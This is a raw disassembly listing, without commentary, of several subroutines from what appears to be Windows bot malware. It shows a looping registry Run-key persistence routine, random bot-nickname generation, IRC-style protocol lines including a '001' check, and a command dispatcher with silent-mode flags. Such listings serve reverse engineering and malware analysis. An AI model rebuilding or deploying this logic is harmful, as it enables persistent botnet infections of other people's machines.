push [ebp+94h+var_114]
mov [ebp+94h+var_10C], eax
call sub_402A45
push eax
xor ebx, ebx
push ebx
push [ebp+94h+var_114]
call sub_407B70
push [ebp+94h+var_10C]
call sub_402A45
push eax
push ebx
push [ebp+94h+var_10C]
call sub_407B70
push edi
lea eax, [ebp+94h+var_104]
push ebx
push eax
call sub_407B70
push esi
call sub_402A45
add esp, 40h
push eax
push ebx
push esi
call sub_407B70
push [ebp+94h+var_108]
call sub_402A45
push eax
push ebx
push [ebp+94h+var_108]
call sub_407B70
push esi
call sub_402A45
push eax
mov ebx, offset byte_425119
call sub_4196D1
mov esi, [ebp+94h+var_108]
push esi
call sub_402A45
push eax
mov ebx, offset byte_425061
call sub_4196D1
mov ebx, [ebp+94h+var_114]
push ebx
call sub_402A45
add esp, 30h
dec eax
push eax
push ebx
call ds:dword_41D0F4
push esi
mov esi, [ebp+94h+var_10C]
push ebx
push offset dword_4200F0
push esi
call sub_402A45
pop ecx
dec eax
push eax
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41707E: ; CODE XREF: sub_416F86+FD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41707E
sub eax, ecx
push edi
mov [eax+esi], dl
lea eax, [ebp+94h+var_104]
push eax
push [ebp+94h+var_110]
push offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_4170D1
lea eax, [ebp+94h+var_104]
mov ecx, esi
loc_4170AA: ; CODE XREF: sub_416F86+13C�j
mov dl, [ecx]
cmp dl, [eax]
jnz short loc_4170C8
test dl, dl
jz short loc_4170C4
mov dl, [ecx+1]
cmp dl, [eax+1]
jnz short loc_4170C8
inc ecx
inc ecx
inc eax
inc eax
test dl, dl
jnz short loc_4170AA
loc_4170C4: ; CODE XREF: sub_416F86+12C�j
xor eax, eax
jmp short loc_4170CD
; ---------------------------------------------------------------------------
loc_4170C8: ; CODE XREF: sub_416F86+128�j
; sub_416F86+134�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4170CD: ; CODE XREF: sub_416F86+140�j
test eax, eax
jz short loc_4170E2
loc_4170D1: ; CODE XREF: sub_416F86+11D�j
push esi
push [ebp+94h+var_110]
push offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_4170E2: ; CODE XREF: sub_416F86+149�j
push [ebp+94h+var_110]
call sub_402B9B
push [ebp+94h+var_108]
call sub_402B9B
push ebx
call sub_402B9B
push esi
call sub_402B9B
mov ecx, [ebp+94h+var_4]
add esp, 10h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 94h
leave
retn
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_417119 proc near ; DATA XREF: .kSjx934:0041BF1E�o
var_504 = byte ptr -504h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_304 = byte ptr -304h
var_303 = byte ptr -303h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 504h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 0FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407B70
push esi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407B70
push esi
lea eax, [ebp+var_303]
push ebx
push eax
mov [ebp+var_304], bl
call sub_407B70
push esi
lea eax, [ebp+var_103]
push ebx
push eax
mov [ebp+var_104], bl
call sub_407B70
add esp, 30h
mov edi, 100h
loc_41718E: ; CODE XREF: sub_417119+1AE�j
push edi
lea esi, [ebp+var_204]
mov ebx, offset byte_425119
call sub_4196D1
push edi
lea esi, [ebp+var_404]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
pop ecx
mov esi, 0FFh
push esi
lea eax, [ebp+var_304]
push eax
call ds:dword_41D0F4
lea eax, [ebp+var_404]
push eax
lea eax, [ebp+var_304]
push eax
push offset aSS_3 ; "%s\\%s"
lea eax, [ebp+var_104]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_104]
add esp, 14h
lea ecx, [eax+1]
loc_4171F1: ; CODE XREF: sub_417119+DD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4171F1
sub eax, ecx
xor ebx, ebx
mov [ebp+eax+var_104], bl
push edi
lea eax, [ebp+var_504]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_417258
lea ecx, [ebp+var_504]
lea eax, [ebp+var_104]
loc_417231: ; CODE XREF: sub_417119+130�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_41724F
cmp dl, bl
jz short loc_41724B
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_41724F
inc eax
inc eax
inc ecx
inc ecx
cmp dl, bl
jnz short loc_417231
loc_41724B: ; CODE XREF: sub_417119+120�j
xor eax, eax
jmp short loc_417254
; ---------------------------------------------------------------------------
loc_41724F: ; CODE XREF: sub_417119+11C�j
; sub_417119+128�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417254: ; CODE XREF: sub_417119+134�j
cmp eax, ebx
jz short loc_417273
loc_417258: ; CODE XREF: sub_417119+10A�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_417273: ; CODE XREF: sub_417119+13D�j
push edi
lea eax, [ebp+var_304]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_104]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_504]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_204]
push ebx
push eax
call sub_407B70
push edi
lea eax, [ebp+var_404]
push ebx
push eax
call sub_407B70
add esp, 3Ch
push 3A98h
call ds:dword_41D0FC
jmp loc_41718E
sub_417119 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172CC proc near ; CODE XREF: sub_41783D+24F�p
; sub_41783D+323�p ...
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
mov esi, 1FFh
push esi
lea eax, [ebp+var_203]
push 0
push eax
mov [ebp+var_204], 0
call sub_407B70
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_204]
push esi
push eax
call sub_403436
lea eax, [ebp+var_204]
add esp, 1Ch
lea esi, [eax+1]
loc_41731B: ; CODE XREF: sub_4172CC+54�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41731B
sub eax, esi
mov [ebp+eax+var_204], cl
lea eax, [ebp+var_204]
lea esi, [eax+1]
loc_417334: ; CODE XREF: sub_4172CC+6D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417334
push 0
sub eax, esi
push eax
lea eax, [ebp+var_204]
push eax
push dword ptr [edi]
call ds:dword_41D228
mov ecx, [ebp+var_4]
test eax, eax
setnz al
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_4172CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417361 proc near ; CODE XREF: sub_40177B+268�p
; sub_4019F3+21A�p ...
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 40Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push edi
mov [ebp+var_408], eax
mov eax, [ebp+arg_8]
mov edi, 1FFh
xor ebx, ebx
push edi
mov [ebp+var_40C], eax
lea eax, [ebp+var_203]
push ebx
push eax
mov [ebp+var_204], bl
call sub_407B70
push edi
lea eax, [ebp+var_403]
push ebx
push eax
mov [ebp+var_404], bl
call sub_407B70
add esp, 18h
cmp [ebp+arg_4], 1
jz loc_41747D
push esi
push 0Dh
call sub_402648
mov esi, eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_404]
push edi
push eax
call sub_403436
lea eax, [ebp+var_404]
add esp, 14h
lea ecx, [eax+1]
loc_4173EE: ; CODE XREF: sub_417361+92�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4173EE
sub eax, ecx
push esi
mov [ebp+eax+var_404], bl
call sub_402A45
push eax
mov ebx, offset dword_425570
call sub_4196D1
lea eax, [ebp+var_404]
push eax
push [ebp+var_40C]
lea eax, [ebp+var_204]
push esi
push offset aSSS_1 ; "%s %s %s\r\n"
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_204]
add esp, 20h
lea ecx, [eax+1]
loc_41743B: ; CODE XREF: sub_417361+DF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41743B
sub eax, ecx
push esi
mov [ebp+eax+var_204], dl
call sub_402B9B
pop ecx
lea eax, [ebp+var_204]
lea ecx, [eax+1]
pop esi
loc_41745C: ; CODE XREF: sub_417361+100�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41745C
sub eax, ecx
push 0
push eax
lea eax, [ebp+var_204]
push eax
mov eax, [ebp+var_408]
push dword ptr [eax]
call ds:dword_41D228
loc_41747D: ; CODE XREF: sub_417361+5D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417361 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41748B proc near ; CODE XREF: sub_41802F+23B�p
; sub_41829C+39�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3C = byte ptr -3Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor eax, eax
mov [ebp+var_40], 0
lea edi, [ebp+var_3F]
stosw
stosb
push 0Dh
pop ecx
mov esi, offset aQwertyuiopasdf ; "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
lea edi, [ebp+var_3C]
rep movsd
lea eax, [ebp+var_48]
push eax
movsb
call ds:dword_41D1EC
call ds:dword_41D108
mov ecx, [ebp+var_48]
mov edx, [ebp+var_44]
add ecx, edx
cmp eax, ecx
jb short loc_4174D7
add ecx, eax
jmp short loc_4174D9
; ---------------------------------------------------------------------------
loc_4174D7: ; CODE XREF: sub_41748B+46�j
sub ecx, eax
loc_4174D9: ; CODE XREF: sub_41748B+4A�j
push ecx
call sub_403356
pop ecx
push 8
pop ecx
xor eax, eax
mov edi, ebx
rep stosd
push offset asc_420310 ; "["
stosw
push 22h
push ebx
stosb
call sub_402AEE
mov eax, ebx
add esp, 0Ch
lea esi, [eax+1]
loc_417501: ; CODE XREF: sub_41748B+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417501
xor edi, edi
sub eax, esi
push edi
mov [eax+ebx], cl
push 4
pop ecx
lea esi, [ebp+var_40]
call sub_418E51
pop ecx
mov eax, esi
push eax
push ebx
push offset aSS ; "%s%s|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 14h
lea esi, [eax+1]
loc_417535: ; CODE XREF: sub_41748B+AF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417535
sub eax, esi
push edi
push 4
lea esi, [ebp+var_40]
mov [eax+ebx], cl
call sub_418E1F
mov eax, esi
push eax
push ebx
push offset aSS_0 ; "%s%s|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 1Ch
lea esi, [eax+1]
loc_417565: ; CODE XREF: sub_41748B+DF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417565
sub eax, esi
mov [eax+ebx], cl
call sub_419347
test al, al
jz short loc_41759C
push ebx
push offset aSp ; "%sP|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_417590: ; CODE XREF: sub_41748B+10A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417590
sub eax, esi
mov [eax+ebx], cl
loc_41759C: ; CODE XREF: sub_41748B+ED�j
call sub_418DA0
mov eax, ds:dword_42659C
cmp eax, edi
mov ecx, ds:dword_426598
jg short loc_4175D8
jl short loc_4175B7
cmp ecx, 0Ah
jnb short loc_4175D8
loc_4175B7: ; CODE XREF: sub_41748B+125�j
push eax
push ecx
push ebx
push offset aS0I64u ; "%s0%I64u|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175CF: ; CODE XREF: sub_41748B+149�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175CF
jmp short loc_4175F7
; ---------------------------------------------------------------------------
loc_4175D8: ; CODE XREF: sub_41748B+123�j
; sub_41748B+12A�j
push eax
push ecx
push ebx
push offset aSI64u ; "%s%I64u|"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175F0: ; CODE XREF: sub_41748B+16A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175F0
loc_4175F7: ; CODE XREF: sub_41748B+14B�j
sub eax, esi
mov byte ptr [eax+ebx], 0
xor esi, esi
cmp ds:dword_42521C, edi
jle short loc_417644
loc_417607: ; CODE XREF: sub_41748B+1B7�j
call sub_403363
push 31h
pop ecx
xor edx, edx
div ecx
movsx eax, [ebp+edx+var_3C]
push eax
push ebx
push offset aSC ; "%s%c"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 14h
lea edi, [eax+1]
loc_41762F: ; CODE XREF: sub_41748B+1A9�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41762F
sub eax, edi
inc esi
mov [eax+ebx], cl
cmp esi, ds:dword_42521C
jl short loc_417607
loc_417644: ; CODE XREF: sub_41748B+17A�j
push ebx
push offset aS ; "%s]"
push 22h
push ebx
call sub_402AEE
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_41765A: ; CODE XREF: sub_41748B+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41765A
sub eax, esi
mov [eax+ebx], cl
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
mov eax, ebx
pop esi
call sub_402710
leave
retn
sub_41748B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417676 proc near ; CODE XREF: sub_41783D+6A7�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 824h
push ebx
push esi
push edi
push offset asc_4202C8 ; " "
push [ebp+arg_14]
xor ebx, ebx
mov byte ptr [ebp+var_8], 0
mov [ebp+var_4], ebx
call sub_403A34
jmp short loc_4176D8
; ---------------------------------------------------------------------------
loc_41769A: ; CODE XREF: sub_417676+68�j
mov eax, [ebp+var_4]
push offset aS_8 ; "-s"
push esi
mov [ebp+eax*4+var_820], esi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_4176C6
push offset aS_9 ; "/s"
push esi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jnz short loc_4176CA
loc_4176C6: ; CODE XREF: sub_417676+3D�j
mov byte ptr [ebp+var_8], 1
loc_4176CA: ; CODE XREF: sub_417676+4E�j
push offset asc_4202D4 ; " "
push ebx
call sub_403A34
inc [ebp+var_4]
loc_4176D8: ; CODE XREF: sub_417676+22�j
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jnz short loc_41769A
mov edi, [ebp+arg_0]
mov esi, [ebp+var_820]
add edi, 5
mov edx, edi
mov ecx, esi
loc_4176F0: ; CODE XREF: sub_417676+92�j
mov al, [ecx]
cmp al, [edx]
jnz short loc_41770E
test al, al
jz short loc_41770A
mov al, [ecx+1]
cmp al, [edx+1]
jnz short loc_41770E
inc ecx
inc ecx
inc edx
inc edx
test al, al
jnz short loc_4176F0
loc_41770A: ; CODE XREF: sub_417676+82�j
xor eax, eax
jmp short loc_417713
; ---------------------------------------------------------------------------
loc_41770E: ; CODE XREF: sub_417676+7E�j
; sub_417676+8A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417713: ; CODE XREF: sub_417676+96�j
cmp eax, ebx
jz short loc_417724
mov eax, edi
mov ecx, esi
call sub_419044
test eax, eax
jz short loc_417750
loc_417724: ; CODE XREF: sub_417676+9F�j
xor eax, eax
cmp [ebp+var_4], ebx
jle short loc_41774D
mov ecx, [ebp+var_4]
dec ecx
loc_41772F: ; CODE XREF: sub_417676+CF�j
cmp eax, ecx
jz short loc_417741
mov edx, [ebp+eax*4+var_81C]
mov [ebp+eax*4+var_820], edx
loc_417741: ; CODE XREF: sub_417676+BB�j
inc eax
cmp eax, [ebp+var_4]
jl short loc_41772F
mov esi, [ebp+var_820]
loc_41774D: ; CODE XREF: sub_417676+B3�j
dec [ebp+var_4]
loc_417750: ; CODE XREF: sub_417676+AC�j
cmp byte ptr [ebp+var_8], bl
jz short loc_417758
dec [ebp+var_4]
loc_417758: ; CODE XREF: sub_417676+DD�j
mov al, [esi]
cmp al, ds:byte_424FE8
jnz loc_417836
mov eax, esi
lea ecx, [eax+1]
loc_41776B: ; CODE XREF: sub_417676+FA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41776B
sub eax, ecx
push eax
lea eax, [esi+1]
push eax
push esi
call sub_403910
mov eax, ds:dword_433C40
mov esi, [eax]
mov ebx, offset dword_433C3C
mov edi, ebx
add esp, 0Ch
mov [ebp+var_C], esi
mov [ebp+var_10], edi
loc_417796: ; CODE XREF: sub_417676+192�j
test edi, edi
mov eax, ds:dword_433C40
mov [ebp+var_14], eax
jz short loc_4177A6
cmp edi, ebx
jz short loc_4177AB
loc_4177A6: ; CODE XREF: sub_417676+12A�j
call sub_402F5D
loc_4177AB: ; CODE XREF: sub_417676+12E�j
cmp esi, [ebp+var_14]
jz loc_417836
test edi, edi
jnz short loc_4177BD
call sub_402F5D
loc_4177BD: ; CODE XREF: sub_417676+140�j
cmp esi, [edi+4]
jnz short loc_4177C7
call sub_402F5D
loc_4177C7: ; CODE XREF: sub_417676+14A�j
mov ecx, [ebp+var_820]
lea eax, [esi+0Ch]
loc_4177D0: ; CODE XREF: sub_417676+172�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_4177EE
test dl, dl
jz short loc_4177EA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_4177EE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_4177D0
loc_4177EA: ; CODE XREF: sub_417676+162�j
xor eax, eax
jmp short loc_4177F3
; ---------------------------------------------------------------------------
loc_4177EE: ; CODE XREF: sub_417676+15E�j
; sub_417676+16A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4177F3: ; CODE XREF: sub_417676+176�j
test eax, eax
jz short loc_41780A
lea edi, [ebp+var_20]
lea esi, [ebp+var_10]
call sub_40168C
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jmp short loc_417796
; ---------------------------------------------------------------------------
loc_41780A: ; CODE XREF: sub_417676+17F�j
cmp esi, [edi+4]
jnz short loc_417814
call sub_402F5D
loc_417814: ; CODE XREF: sub_417676+197�j
mov ecx, [esi+8]
mov eax, [ecx]
lea edx, [ebp+var_820]
push edx
mov edx, [ebp+var_4]
dec edx
push edx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_4]
call dword ptr [eax]
loc_417836: ; CODE XREF: sub_417676+EA�j
; sub_417676+138�j
pop edi
pop esi
pop ebx
leave
retn 18h
sub_417676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41783D proc near ; CODE XREF: sub_417F01+107�p
var_10F34 = dword ptr -10F34h
var_10734 = dword ptr -10734h
var_10730 = dword ptr -10730h
var_1072C = byte ptr -1072Ch
var_1062C = byte ptr -1062Ch
var_1052C = byte ptr -1052Ch
var_1042C = byte ptr -1042Ch
var_72C = byte ptr -72Ch
var_72B = byte ptr -72Bh
var_62C = byte ptr -62Ch
var_62B = byte ptr -62Bh
var_52C = byte ptr -52Ch
var_52B = byte ptr -52Bh
var_52A = byte ptr -52Ah
var_32C = byte ptr -32Ch
var_32B = byte ptr -32Bh
var_22C = byte ptr -22Ch
var_22B = byte ptr -22Bh
var_1AC = byte ptr -1ACh
var_1AB = byte ptr -1ABh
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_78 = byte ptr -78h
var_77 = byte ptr -77h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10F38h
call sub_411400
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [ebp+var_10734], eax
lea eax, [ebp+var_52B]
mov edi, ecx
push ebx
push eax
mov [ebp+var_10730], edi
mov [ebp+var_52C], bl
call sub_407B70
add esp, 0Ch
push edi
push offset aS_12 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_52C]
add esp, 10h
lea edi, [eax+1]
loc_4178A5: ; CODE XREF: sub_41783D+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178A5
sub eax, edi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
push offset asc_420254 ; " :"
push eax
call sub_4037B0
push eax
push offset aS_13 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_52C]
add esp, 18h
lea esi, [eax+1]
loc_4178E5: ; CODE XREF: sub_41783D+AD�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178E5
sub eax, esi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
lea esi, [eax+1]
loc_4178FE: ; CODE XREF: sub_41783D+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178FE
sub eax, esi
push eax
lea eax, [ebp+var_52A]
push eax
lea eax, [ebp+var_52C]
push eax
call sub_403910
add esp, 0Ch
push offset asc_42025C ; " "
push [ebp+var_10730]
call sub_403A34
cmp eax, ebx
pop ecx
pop ecx
jz short loc_41797F
xor esi, esi
loc_417936: ; CODE XREF: sub_41783D+140�j
push eax
push offset aS_14 ; "%s"
lea edi, [ebp+esi+var_1072C]
push 0FFh
push edi
call sub_402AEE
mov eax, edi
add esp, 10h
lea edi, [eax+1]
loc_417956: ; CODE XREF: sub_41783D+11E�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417956
sub eax, edi
add eax, esi
push offset asc_420264 ; " "
push ebx
mov [ebp+eax+var_1072C], bl
call sub_403A34
pop ecx
add esi, 100h
cmp eax, ebx
pop ecx
jnz short loc_417936
loc_41797F: ; CODE XREF: sub_41783D+F5�j
xor eax, eax
mov [ebp+var_2C], bl
lea edi, [ebp+var_2B]
stosd
stosd
xor eax, eax
mov [ebp+var_38], bl
lea edi, [ebp+var_37]
stosd
stosd
xor eax, eax
mov [ebp+var_54], bl
lea edi, [ebp+var_53]
stosd
stosd
stosd
xor eax, eax
mov [ebp+var_20], bl
lea edi, [ebp+var_1F]
stosd
push 0FFh
stosd
lea eax, [ebp+var_32B]
push ebx
push eax
mov [ebp+var_32C], bl
call sub_407B70
add esp, 0Ch
push 2Fh
lea eax, [ebp+var_A7]
push ebx
push eax
mov [ebp+var_A8], bl
call sub_407B70
xor eax, eax
mov [ebp+var_14], bl
lea edi, [ebp+var_13]
stosd
stosd
xor eax, eax
mov [ebp+var_44], bl
lea edi, [ebp+var_43]
stosd
add esp, 0Ch
push 7Fh
stosd
lea eax, [ebp+var_22B]
push ebx
push eax
mov [ebp+var_22C], bl
call sub_407B70
add esp, 0Ch
push 9
lea esi, [ebp+var_2C]
mov ebx, offset byte_425543
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_38]
mov ebx, offset byte_425555
call sub_4196D1
pop ecx
push 0Dh
lea esi, [ebp+var_54]
mov ebx, offset dword_425570
call sub_4196D1
pop ecx
lea ecx, [ebp+var_2C]
lea eax, [ebp+var_1072C]
loc_417A40: ; CODE XREF: sub_41783D+21B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417A5E
test dl, dl
jz short loc_417A5A
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417A5E
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417A40
loc_417A5A: ; CODE XREF: sub_41783D+20B�j
xor eax, eax
jmp short loc_417A63
; ---------------------------------------------------------------------------
loc_417A5E: ; CODE XREF: sub_41783D+207�j
; sub_41783D+213�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417A63: ; CODE XREF: sub_41783D+21F�j
test eax, eax
jnz short loc_417AA7
push 9
lea esi, [ebp+var_20]
mov ebx, offset dword_42554C
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_1062C]
push eax
mov eax, esi
push eax
push offset aSS_9 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
test al, al
jnz short loc_417A9F
loc_417A98: ; CODE XREF: sub_41783D+333�j
xor al, al
jmp loc_417EF0
; ---------------------------------------------------------------------------
loc_417A9F: ; CODE XREF: sub_41783D+259�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosb
loc_417AA7: ; CODE XREF: sub_41783D+228�j
lea ecx, [ebp+var_38]
lea eax, [ebp+var_1062C]
loc_417AB0: ; CODE XREF: sub_41783D+28B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417ACE
test dl, dl
jz short loc_417ACA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417ACE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AB0
loc_417ACA: ; CODE XREF: sub_41783D+27B�j
xor eax, eax
jmp short loc_417AD3
; ---------------------------------------------------------------------------
loc_417ACE: ; CODE XREF: sub_41783D+277�j
; sub_41783D+283�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417AD3: ; CODE XREF: sub_41783D+28F�j
test eax, eax
jnz loc_417B75
push 100h
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
mov ecx, esi
lea eax, [ebp+var_1052C]
loc_417AF9: ; CODE XREF: sub_41783D+2D4�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417B17
test dl, dl
jz short loc_417B13
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417B17
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AF9
loc_417B13: ; CODE XREF: sub_41783D+2C4�j
xor eax, eax
jmp short loc_417B1C
; ---------------------------------------------------------------------------
loc_417B17: ; CODE XREF: sub_41783D+2C0�j
; sub_41783D+2CC�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417B1C: ; CODE XREF: sub_41783D+2D8�j
test eax, eax
jnz loc_417EEE
push 9
lea esi, [ebp+var_14]
mov ebx, offset word_42555E
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
mov eax, esi
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
push offset aSSS_2 ; "%s %s %s\r\n"
call sub_4172CC
add esp, 10h
loc_417B68: ; CODE XREF: sub_41783D+3E0�j
test al, al
jnz loc_417EEE
jmp loc_417A98
; ---------------------------------------------------------------------------
loc_417B75: ; CODE XREF: sub_41783D+298�j
push 4
mov edi, offset a001 ; "001"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417C22
push 9
lea esi, [ebp+var_14]
mov ebx, offset word_42555E
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_44]
mov ebx, offset byte_425567
call sub_4196D1
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
mov [esp+10h+var_10], 100h
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
pop ecx
push 80h
lea esi, [ebp+var_22C]
mov ebx, offset byte_424FE9
call sub_4196D1
